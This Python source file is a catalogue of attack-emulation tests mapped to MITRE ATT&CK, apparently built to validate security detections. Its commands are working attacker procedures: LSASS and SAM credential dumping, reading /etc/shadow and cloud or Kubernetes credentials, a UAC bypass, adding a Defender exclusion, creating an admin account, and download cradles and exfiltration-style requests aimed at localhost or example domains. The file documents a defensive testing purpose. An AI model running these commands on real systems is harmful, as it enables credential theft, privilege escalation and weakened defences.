# -*- coding: utf-8 -*-
"""xor_atomics_catalog.py - XORCISM curated BAS/AEV atomic-test library.

Atomic Red Team-style adversary-emulation tests, mapped to MITRE ATT&CK, authored to be
executed directly by the XOR agent (`xor_agent.py --scan emulate --scenario <id>`).

DESIGN PRINCIPLE - faithful but SAFE. Each test produces the *telemetry* a real attacker
procedure would (so detections/controls can be validated), while staying NON-DESTRUCTIVE and
REVERSIBLE:
  * network tests target localhost (127.0.0.1:9, a closed port), link-local cloud metadata
    (169.254.169.254), or benign example domains - never real attacker infrastructure;
  * state-changing tests ship a `cleanup` that fully reverts them (reg keys, tasks, services,
    accounts, files all created with an `xor`/`XORAtomic` marker and removed afterwards);
  * genuinely destructive techniques (log-clear, shadow-copy delete, service stop, reboot) are
    either replaced by a SAFE simulation (e.g. ransomware *behavior* on throwaway temp files,
    or `vssadmin list` instead of delete) or shipped as executor="manual" so the agent SKIPS
    them by default.
The agent gates execution: only read-only recon auto-runs; the full procedure runs only with
XOR_ALLOW_ATOMIC_EXEC=1 set on the authorized host (see xor_agent.py _emu_exec). For authorized
BAS/AEV on systems you operate.

Imported by import_atomics.py --xorcism into XTHREAT.ATOMICTEST (+ EMULATIONSCENARIO groupings).
"""
from __future__ import annotations


def _ref(aid: str) -> str:
    return "https://attack.mitre.org/techniques/" + aid.replace(".", "/") + "/"


def t(aid, name, plat, ex, cmd, cleanup="", desc=""):
    return {"attackId": aid, "name": name, "platform": plat, "executor": ex,
            "command": cmd, "cleanup": cleanup, "description": desc, "references": _ref(aid)}


TESTS = [
    # ───────────────────────── Execution (TA0002) ─────────────────────────
    t("T1059.001", "PowerShell encoded command (benign whoami)", "windows", "command_prompt",
      r'''powershell.exe -NoProfile -EncodedCommand dwBoAG8AYQBtAGkA''',
      desc="Runs a base64/UTF-16LE-encoded PowerShell command (decodes to 'whoami'). Validates detection of -EncodedCommand obfuscation. Benign payload."),
    t("T1059.001", "PowerShell download cradle (localhost)", "windows", "powershell",
      r'''try { IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:9/benign.ps1') } catch {}''',
      desc="Classic IEX download-cradle pattern against a closed local port (fails safely). Validates script-block / cradle detection."),
    t("T1059.003", "Windows command shell - environment recon", "windows", "command_prompt",
      r'''cmd.exe /c set''',
      desc="cmd.exe one-liner enumerating environment variables. Benign."),
    t("T1059.004", "Unix shell execution", "linux", "sh",
      r'''id; uname -a''',
      desc="Basic Unix shell exec via sh -c. Benign recon."),
    t("T1047", "WMI process creation", "windows", "command_prompt",
      r'''wmic.exe process call create "cmd.exe /c exit"''',
      desc="Spawns a benign process through WMI (Win32_Process.Create). Validates WMI-execution telemetry."),

    # ───────────────────────── Defense Evasion / LOLBins (TA0005) ─────────────────────────
    t("T1218.005", "Mshta LOLBin execution", "windows", "command_prompt",
      r'''mshta.exe "javascript:close()"''',
      desc="Launches mshta.exe (no payload; window closes immediately). Validates mshta-abuse telemetry."),
    t("T1218.010", "Regsvr32 Squiblydoo (localhost)", "windows", "command_prompt",
      r'''regsvr32.exe /s /n /u /i:http://127.0.0.1:9/x.sct scrobj.dll''',
      desc="Squiblydoo: regsvr32 fetching a remote scriptlet from a closed local port (fails safely). Validates regsvr32-abuse detection."),
    t("T1218.011", "Rundll32 JavaScript execution", "windows", "command_prompt",
      r'''rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();close();''',
      desc="rundll32 abusing the mshtml RunHTMLApplication entry point (no payload). Validates rundll32-abuse telemetry."),
    t("T1218.007", "Msiexec remote package (localhost)", "windows", "command_prompt",
      r'''msiexec.exe /quiet /i http://127.0.0.1:9/x.msi''',
      desc="msiexec installing a remote MSI from a closed local port (fails safely). Validates msiexec-abuse detection."),
    t("T1197", "BITS job creation", "windows", "command_prompt",
      r'''bitsadmin /create /download XORAtomic''',
      r'''bitsadmin /cancel XORAtomic''',
      desc="Creates (then cancels) a BITS transfer job - a common persistence/ingress LOLBin. Reversible."),
    t("T1105", "Ingress tool transfer via certutil (localhost)", "windows", "command_prompt",
      r'''certutil.exe -urlcache -split -f http://127.0.0.1:9/x.txt %TEMP%\xor_atomic.txt''',
      r'''del /f /q %TEMP%\xor_atomic.txt 2>nul''',
      desc="certutil downloading from a closed local port (fails safely). Validates certutil-download telemetry."),
    t("T1564.004", "NTFS alternate data stream write", "windows", "command_prompt",
      r'''cmd.exe /c echo benign-ads > "%TEMP%\xor_ads.txt:hidden.txt"''',
      r'''del /f /q "%TEMP%\xor_ads.txt" 2>nul''',
      desc="Writes content to an NTFS alternate data stream on a throwaway temp file. Validates ADS-creation detection. Reversible."),
    t("T1140", "Deobfuscate/decode via certutil", "windows", "command_prompt",
      r'''cmd.exe /c echo YmVuaWdu> %TEMP%\xor_b64.txt & certutil -decode %TEMP%\xor_b64.txt %TEMP%\xor_dec.txt''',
      r'''del /f /q %TEMP%\xor_b64.txt %TEMP%\xor_dec.txt 2>nul''',
      desc="certutil -decode of a benign base64 file. Validates certutil-decode telemetry. Reversible."),
    t("T1027", "AMSI-bypass string pattern (benign no-op)", "windows", "powershell",
      r'''$marker = 'amsiInitFailed'; "AMSI-bypass-pattern BAS test (benign no-op): $marker" | Out-Null''',
      desc="Emits a well-known AMSI-bypass marker string WITHOUT performing any bypass. Validates signature-based detection of AMSI-tampering patterns. No-op."),
    t("T1562.001", "Add Windows Defender exclusion path", "windows", "powershell",
      r'''Add-MpPreference -ExclusionPath "$env:TEMP\xor_atomic" -ErrorAction SilentlyContinue''',
      r'''Remove-MpPreference -ExclusionPath "$env:TEMP\xor_atomic" -ErrorAction SilentlyContinue''',
      desc="Adds (then removes) a Defender exclusion - a common impair-defenses step - WITHOUT disabling protection. Reversible. Requires admin."),
    t("T1070.001", "Clear Windows event log (manual/destructive)", "windows", "manual",
      r'''# Manual & destructive: wevtutil cl Security  (clears the Security event log). The agent SKIPS this. Run only on an authorized throwaway host and record whether it is detected/blocked.''',
      desc="Log clearing is destructive (loses real telemetry), so it is shipped manual-only. Detection target: Security event 1102."),
    t("T1497.001", "VM/sandbox evasion checks (recon)", "windows", "powershell",
      r'''Get-CimInstance Win32_ComputerSystem | Select-Object Manufacturer,Model''',
      desc="Reads system manufacturer/model to fingerprint virtualization (VMware/VirtualBox/QEMU). Read-only."),
    t("T1222.001", "File permissions modification (icacls)", "windows", "command_prompt",
      r'''cmd.exe /c echo benign> %TEMP%\xor_icacls.txt & icacls %TEMP%\xor_icacls.txt /grant Everyone:F''',
      r'''del /f /q %TEMP%\xor_icacls.txt 2>nul''',
      desc="Grants Everyone:F on a throwaway temp file via icacls. Validates permission-weakening detection. Reversible."),
    t("T1070.004", "File deletion", "windows", "command_prompt",
      r'''cmd.exe /c echo benign> %TEMP%\xor_del.txt & del /f /q %TEMP%\xor_del.txt''',
      desc="Creates then deletes its own throwaway file (anti-forensics indicator). Self-contained / safe."),
    t("T1207", "Driver enumeration (BYOVD recon)", "windows", "command_prompt",
      r'''driverquery /v''',
      desc="Enumerates loaded drivers - reconnaissance preceding Bring-Your-Own-Vulnerable-Driver. Read-only (no driver is loaded)."),

    # ───────────────────────── Persistence (TA0003) ─────────────────────────
    t("T1547.001", "Registry Run key persistence", "windows", "command_prompt",
      r'''reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v XORAtomic /t REG_SZ /d "%TEMP%\xor_atomic.exe" /f''',
      r'''reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v XORAtomic /f''',
      desc="Adds (then removes) an HKCU Run-key autostart value. The value never executes during the test. Reversible."),
    t("T1053.005", "Scheduled task persistence", "windows", "command_prompt",
      r'''schtasks /create /tn XORAtomic /tr "cmd.exe /c exit" /sc onlogon /f''',
      r'''schtasks /delete /tn XORAtomic /f''',
      desc="Creates (then deletes) a logon-triggered scheduled task running a benign command. Reversible."),
    t("T1543.003", "New Windows service", "windows", "command_prompt",
      r'''sc.exe create XORAtomic binPath= "cmd.exe /c exit" start= demand''',
      r'''sc.exe delete XORAtomic''',
      desc="Creates (then deletes) a benign on-demand service. Validates service-creation detection. Reversible. Requires admin."),
    t("T1547.001", "Startup folder persistence", "windows", "powershell",
      r'''Set-Content "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\xor_atomic.bat" 'rem benign XOR atomic test' ''',
      r'''Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\xor_atomic.bat" -Force -ErrorAction SilentlyContinue''',
      desc="Drops (then removes) a benign .bat in the user Startup folder. Reversible."),
    t("T1136.001", "Create local account", "windows", "command_prompt",
      r'''net user xoratomic P@ssw0rd!23 /add''',
      r'''net user xoratomic /del''',
      desc="Creates (then deletes) a local account. Validates account-creation detection. Reversible."),
    t("T1098", "Add account to local Administrators", "windows", "command_prompt",
      r'''net localgroup administrators xoratomic /add''',
      r'''net localgroup administrators xoratomic /del''',
      desc="Adds (then removes) the test account to local Administrators. Run after the create-account test. Reversible."),
    t("T1546.003", "WMI event-subscription persistence", "windows", "powershell",
      r'''$f=Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{Name='XORAtomic';EventNamespace='root\cimv2';QueryLanguage='WQL';Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"}; $c=Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments @{Name='XORAtomic';CommandLineTemplate='cmd.exe /c exit'}; Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{Filter=$f;Consumer=$c} | Out-Null''',
      r'''Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding | Where-Object { $_.Filter -match 'XORAtomic' } | Remove-WmiObject; Get-WmiObject -Namespace root\subscription -Class __EventFilter -Filter "Name='XORAtomic'" | Remove-WmiObject; Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer -Filter "Name='XORAtomic'" | Remove-WmiObject''',
      desc="Registers (then removes) a permanent WMI event filter+consumer+binding - a stealthy persistence technique. Reversible. Requires admin."),
    t("T1053.003", "Cron persistence", "linux", "sh",
      r'''(crontab -l 2>/dev/null; echo '* * * * * /bin/true # XORAtomic') | crontab -''',
      r'''crontab -l 2>/dev/null | grep -v XORAtomic | crontab -''',
      desc="Adds (then removes) a benign cron entry. Reversible."),
    t("T1546.004", "Shell rc-file persistence (.bashrc)", "linux", "sh",
      r'''echo '# XORAtomic test marker' >> ~/.bashrc''',
      r'''sed -i '/# XORAtomic test marker/d' ~/.bashrc''',
      desc="Appends (then removes) a benign marker to ~/.bashrc. Reversible."),

    # ───────────────────────── Privilege Escalation (TA0004) ─────────────────────────
    t("T1548.002", "UAC bypass via fodhelper", "windows", "powershell",
      r'''New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force | Out-Null; New-ItemProperty "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force | Out-Null; Set-ItemProperty "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd.exe /c exit" -Force; Start-Process "C:\Windows\System32\fodhelper.exe"''',
      r'''Remove-Item "HKCU:\Software\Classes\ms-settings" -Recurse -Force -ErrorAction SilentlyContinue''',
      desc="fodhelper auto-elevation UAC bypass with a benign elevated command (cmd /c exit). Validates UAC-bypass detection (HKCU ms-settings hijack). Reversible."),
    t("T1134", "Token & privilege enumeration", "windows", "command_prompt",
      r'''whoami /priv''',
      desc="Lists the current token's privileges (e.g. SeDebug/SeImpersonate) - reconnaissance for token abuse. Read-only."),
    t("T1055", "Process injection (manual)", "windows", "manual",
      r'''# Manual: perform a process injection (CreateRemoteThread / QueueUserAPC / mapped-section) into a benign host process with your own tooling and record the EDR outcome. Not auto-run.''',
      desc="Real process injection requires bespoke tooling; shipped manual. Detection target: cross-process write/execute, suspicious RWX allocations."),

    # ───────────────────────── Credential Access (TA0006) ─────────────────────────
    t("T1003.001", "LSASS memory dump via comsvcs MiniDump", "windows", "powershell",
      r'''rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id $env:TEMP\xor_lsass.dmp full''',
      r'''Remove-Item $env:TEMP\xor_lsass.dmp -Force -ErrorAction SilentlyContinue''',
      desc="The canonical LSASS-access credential-dump procedure (comsvcs.dll MiniDump). The dump is deleted by cleanup. Validates LSASS-access detection. Requires admin + XOR_ALLOW_ATOMIC_EXEC."),
    t("T1003.002", "Dump SAM/SYSTEM registry hives", "windows", "command_prompt",
      r'''reg save HKLM\SAM %TEMP%\xor_sam.hive /y & reg save HKLM\SYSTEM %TEMP%\xor_sys.hive /y''',
      r'''del /f /q %TEMP%\xor_sam.hive %TEMP%\xor_sys.hive 2>nul''',
      desc="Saves the SAM and SYSTEM hives (offline local-hash extraction). Hives are deleted by cleanup. Requires admin."),
    t("T1558.003", "Kerberoasting - request a service ticket", "windows", "powershell",
      r'''Add-Type -AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HOST/$env:COMPUTERNAME" | Out-Null''',
      desc="Requests a Kerberos TGS for a benign SPN (the local HOST SPN). Validates Kerberoasting detection (event 4769, RC4 ticket requests). No state change."),
    t("T1552.001", "Search files for credentials", "windows", "command_prompt",
      r'''findstr /si /m password "%TEMP%\*.txt"''',
      desc="Searches temp .txt files for the string 'password'. Validates credential-hunting detection. Read-only."),
    t("T1555.003", "Browser credential-store access (recon)", "windows", "powershell",
      r'''Test-Path "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"''',
      desc="Checks for the Chrome 'Login Data' credential store (read-only existence test). Validates browser-credential-theft precursor detection."),
    t("T1552.005", "Cloud instance metadata - AWS IMDS credentials", "cross-platform", "command_prompt",
      r'''curl.exe -s --max-time 3 http://169.254.169.254/latest/meta-data/iam/security-credentials/''',
      desc="Queries the AWS link-local instance metadata service for IAM role credentials - a top cloud credential-theft technique. Read-only; harmless off-cloud. (curl ships with Windows 10+/Linux/macOS.)"),
    t("T1552.005", "Cloud instance metadata - Azure IMDS", "cross-platform", "command_prompt",
      r'''curl.exe -s --max-time 3 -H "Metadata:true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"''',
      desc="Queries the Azure IMDS endpoint (requires the Metadata:true header). Validates detection of cloud-metadata credential access. Read-only."),
    t("T1528", "Kubernetes service-account token theft", "linux", "sh",
      r'''cat /var/run/secrets/kubernetes.io/serviceaccount/token''',
      desc="Reads the mounted Kubernetes service-account JWT from inside a container/pod - a modern lateral-movement/cred-access technique. Read-only."),
    t("T1003.008", "Read /etc/shadow", "linux", "sh",
      r'''cat /etc/shadow''',
      desc="Attempts to read the Unix password hash file (needs root). Validates sensitive-file-access detection. Read-only."),

    # ───────────────────────── Discovery (TA0007) ─────────────────────────
    t("T1087.002", "Domain account discovery", "windows", "command_prompt",
      r'''net group "Domain Admins" /domain''',
      desc="Enumerates Domain Admins membership. Read-only AD recon (auto-runs on the safe allowlist)."),
    t("T1482", "Domain trust discovery", "windows", "command_prompt",
      r'''nltest /domain_trusts''',
      desc="Enumerates domain trusts. Read-only AD recon."),
    t("T1518.001", "Security software discovery", "windows", "powershell",
      r'''Get-CimInstance -Namespace root\SecurityCenter2 -Class AntiVirusProduct | Select-Object displayName''',
      desc="Enumerates registered AV/EDR products via SecurityCenter2. Read-only."),
    t("T1057", "Process discovery", "windows", "command_prompt",
      r'''tasklist /v''',
      desc="Lists running processes. Read-only (auto-runs on the safe allowlist)."),
    t("T1018", "Remote system discovery", "windows", "command_prompt",
      r'''net view /all''',
      desc="Enumerates hosts/shares on the network. Read-only."),
    t("T1049", "System network connections discovery", "windows", "command_prompt",
      r'''netstat -ano''',
      desc="Lists active TCP/UDP connections and owning PIDs. Read-only (auto-runs on the safe allowlist)."),

    # ───────────────────────── Lateral Movement (TA0008) ─────────────────────────
    t("T1021.002", "SMB admin-share access (localhost)", "windows", "command_prompt",
      r'''net use \\127.0.0.1\C$''',
      r'''net use \\127.0.0.1\C$ /delete /y 2>nul''',
      desc="Mounts the C$ admin share on localhost (loopback - no remote host touched). Validates admin-share-access detection. Reversible."),
    t("T1021.006", "WinRM availability check (recon)", "windows", "powershell",
      r'''Test-WSMan -ComputerName localhost''',
      desc="Probes WinRM/WS-Management on localhost. Read-only lateral-movement precursor."),

    # ───────────────────────── Collection (TA0009) ─────────────────────────
    t("T1560.001", "Stage & archive collected data", "windows", "powershell",
      r'''$d="$env:TEMP\xor_collect"; New-Item -ItemType Directory $d -Force | Out-Null; 'benign' | Set-Content "$d\f.txt"; Compress-Archive -Path "$d\*" -DestinationPath "$env:TEMP\xor_collect.zip" -Force''',
      r'''Remove-Item "$env:TEMP\xor_collect","$env:TEMP\xor_collect.zip" -Recurse -Force -ErrorAction SilentlyContinue''',
      desc="Stages benign temp data and archives it (Compress-Archive) - the collection-before-exfil pattern. Reversible."),
    t("T1113", "Screen capture", "windows", "powershell",
      r'''Add-Type -AssemblyName System.Windows.Forms,System.Drawing; $b=New-Object Drawing.Bitmap 120,120; $g=[Drawing.Graphics]::FromImage($b); $g.CopyFromScreen(0,0,0,0,$b.Size); $b.Save("$env:TEMP\xor_shot.png"); $g.Dispose(); $b.Dispose()''',
      r'''Remove-Item "$env:TEMP\xor_shot.png" -Force -ErrorAction SilentlyContinue''',
      desc="Captures a small screenshot to a temp file. Validates screen-capture detection. Reversible."),
    t("T1115", "Clipboard data access (count only)", "windows", "powershell",
      r'''(Get-Clipboard | Measure-Object).Count''',
      desc="Reads the clipboard length (never its content). Validates clipboard-access detection without exposing data."),

    # ───────────────────────── Command & Control / Exfiltration (TA0011 / TA0010) ─────────────────────────
    t("T1071.001", "Web protocol C2 beacon (localhost)", "windows", "powershell",
      r'''try { Invoke-WebRequest -UseBasicParsing -TimeoutSec 3 -Uri http://127.0.0.1:9/c2 } catch {}''',
      desc="Outbound HTTP request to a closed local port (fails safely). Validates web-C2 / suspicious-outbound detection."),
    t("T1071.004", "DNS query to external domain", "windows", "command_prompt",
      r'''nslookup xor-atomic-c2.example.com''',
      desc="Resolves a benign external domain. Validates DNS-telemetry visibility (DNS C2/tunneling precursor). Read-only."),
    t("T1132.001", "Data encoding (base64)", "windows", "powershell",
      r'''[Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("xor-atomic-exfil-marker"))''',
      desc="Base64-encodes a benign marker (the encode-before-exfil pattern). No-op."),
    t("T1048.003", "Exfiltration over DNS (simulated)", "cross-platform", "command_prompt",
      r'''nslookup ZGF0YQ.xor-atomic-exfil.example.com''',
      desc="Resolves a subdomain encoding 'data' (base32-ish) under a benign domain - DNS-exfil pattern. Read-only; no data leaves."),
    t("T1567.002", "Exfil to web service (localhost POST)", "windows", "powershell",
      r'''try { Invoke-WebRequest -UseBasicParsing -TimeoutSec 3 -Method POST -Uri http://127.0.0.1:9/up -Body "xor-atomic" } catch {}''',
      desc="HTTP POST to a closed local port (fails safely). Validates exfil-to-web detection."),

    # ───────────────────────── Impact (TA0040) - safe simulations ─────────────────────────
    t("T1486", "Ransomware behavior simulation (canary)", "windows", "powershell",
      r'''$d="$env:TEMP\xor_ransom_sim"; New-Item -ItemType Directory $d -Force | Out-Null; 1..20 | ForEach-Object { Set-Content "$d\file$_.txt" "benign" }; Get-ChildItem $d -Filter *.txt | ForEach-Object { Rename-Item $_.FullName ($_.FullName + ".xorlock") }; Set-Content "$d\XOR_README_RESTORE.txt" "BAS ransomware-behavior simulation - no real data was touched."''',
      r'''Remove-Item "$env:TEMP\xor_ransom_sim" -Recurse -Force -ErrorAction SilentlyContinue''',
      desc="Generates ransomware behavior on THROWAWAY temp files only: a rapid rename burst to a '.xorlock' extension plus a ransom note. Exercises EDR ransomware-canary/mass-rename detection. No real files are affected. Reversible."),
    t("T1490", "Inhibit system recovery (list shadows - safe)", "windows", "command_prompt",
      r'''vssadmin list shadows''',
      desc="Lists volume shadow copies via vssadmin. SAFE variant: it generates the same 'vssadmin spawned' telemetry as the destructive 'vssadmin delete shadows' WITHOUT deleting anything. Read-only."),
    t("T1489", "Service stop (manual/disruptive)", "windows", "manual",
      r'''# Manual & disruptive: net stop <ServiceName>. The agent SKIPS this. On an authorized host, target a non-critical service and record whether the stop is detected/blocked.''',
      desc="Stopping services can disrupt the host, so it is shipped manual-only. Detection target: security/critical service stopped."),
    t("T1529", "System shutdown/reboot (manual/disruptive)", "windows", "manual",
      r'''# Manual & disruptive: shutdown /r /t 0. The agent SKIPS this. Run only on an authorized throwaway host.''',
      desc="Reboot/shutdown is disruptive, so it is shipped manual-only. Detection target: shutdown.exe / Win32Shutdown."),
]


# Emulation scenarios: group the tests (by name) into directly-runnable BAS plans.
SCENARIOS = [
    {"name": "XORCISM - LOLBins & Defense Evasion", "killChain": "defense-evasion",
     "description": "Living-off-the-land binaries and defense-evasion procedures (mshta, regsvr32, rundll32, certutil, bitsadmin, msiexec, WMI, ADS, AMSI pattern, Defender exclusion).",
     "tests": ["Mshta LOLBin execution", "Regsvr32 Squiblydoo (localhost)", "Rundll32 JavaScript execution",
               "Msiexec remote package (localhost)", "BITS job creation", "Ingress tool transfer via certutil (localhost)",
               "WMI process creation", "NTFS alternate data stream write", "Deobfuscate/decode via certutil",
               "AMSI-bypass string pattern (benign no-op)", "Add Windows Defender exclusion path",
               "PowerShell encoded command (benign whoami)", "Driver enumeration (BYOVD recon)", "File permissions modification (icacls)"]},
    {"name": "XORCISM - Credential Access Sweep", "killChain": "credential-access",
     "description": "Credential-theft procedures: LSASS dump, SAM/SYSTEM hives, Kerberoasting, browser store, credentials-in-files, and cloud/container identity theft.",
     "tests": ["LSASS memory dump via comsvcs MiniDump", "Dump SAM/SYSTEM registry hives", "Kerberoasting - request a service ticket",
               "Browser credential-store access (recon)", "Search files for credentials", "Read /etc/shadow",
               "Cloud instance metadata - AWS IMDS credentials", "Cloud instance metadata - Azure IMDS",
               "Kubernetes service-account token theft"]},
    {"name": "XORCISM - Persistence & Privilege Escalation", "killChain": "persistence",
     "description": "Autostart and escalation footholds: Run key, scheduled task, service, startup folder, WMI subscription, fodhelper UAC bypass, account creation, Linux cron/.bashrc.",
     "tests": ["Registry Run key persistence", "Scheduled task persistence", "New Windows service", "Startup folder persistence",
               "WMI event-subscription persistence", "Create local account", "Add account to local Administrators",
               "UAC bypass via fodhelper", "Token & privilege enumeration", "Cron persistence", "Shell rc-file persistence (.bashrc)"]},
    {"name": "XORCISM - Discovery & Lateral Movement", "killChain": "discovery",
     "description": "Host/domain reconnaissance and lateral-movement precursors (most are read-only and auto-run on the agent's safe allowlist).",
     "tests": ["Domain account discovery", "Domain trust discovery", "Security software discovery", "Process discovery",
               "Remote system discovery", "System network connections discovery", "SMB admin-share access (localhost)",
               "WinRM availability check (recon)", "Windows command shell - environment recon", "Unix shell execution"]},
    {"name": "XORCISM - Collection, C2 & Exfiltration", "killChain": "exfiltration",
     "description": "Collection, command-and-control and exfiltration patterns - all network tests target localhost or benign domains.",
     "tests": ["Stage & archive collected data", "Screen capture", "Clipboard data access (count only)",
               "Web protocol C2 beacon (localhost)", "DNS query to external domain", "Data encoding (base64)",
               "Exfiltration over DNS (simulated)", "Exfil to web service (localhost POST)", "PowerShell download cradle (localhost)"]},
    {"name": "XORCISM - Ransomware & Impact", "killChain": "impact",
     "description": "Impact validation done safely: a ransomware-behavior canary on throwaway files, shadow-copy enumeration, and manual-only disruptive techniques.",
     "tests": ["Ransomware behavior simulation (canary)", "Inhibit system recovery (list shadows - safe)",
               "Service stop (manual/disruptive)", "System shutdown/reboot (manual/disruptive)",
               "Stage & archive collected data", "File deletion"]},
    {"name": "XORCISM - Cloud & Identity (modern)", "killChain": "credential-access",
     "description": "Recent cloud/identity attacker techniques: instance-metadata credential theft (AWS/Azure), Kubernetes SA-token theft, Kerberoasting, and AD admin discovery.",
     "tests": ["Cloud instance metadata - AWS IMDS credentials", "Cloud instance metadata - Azure IMDS",
               "Kubernetes service-account token theft", "Kerberoasting - request a service ticket",
               "Domain account discovery", "Domain trust discovery"]},
]
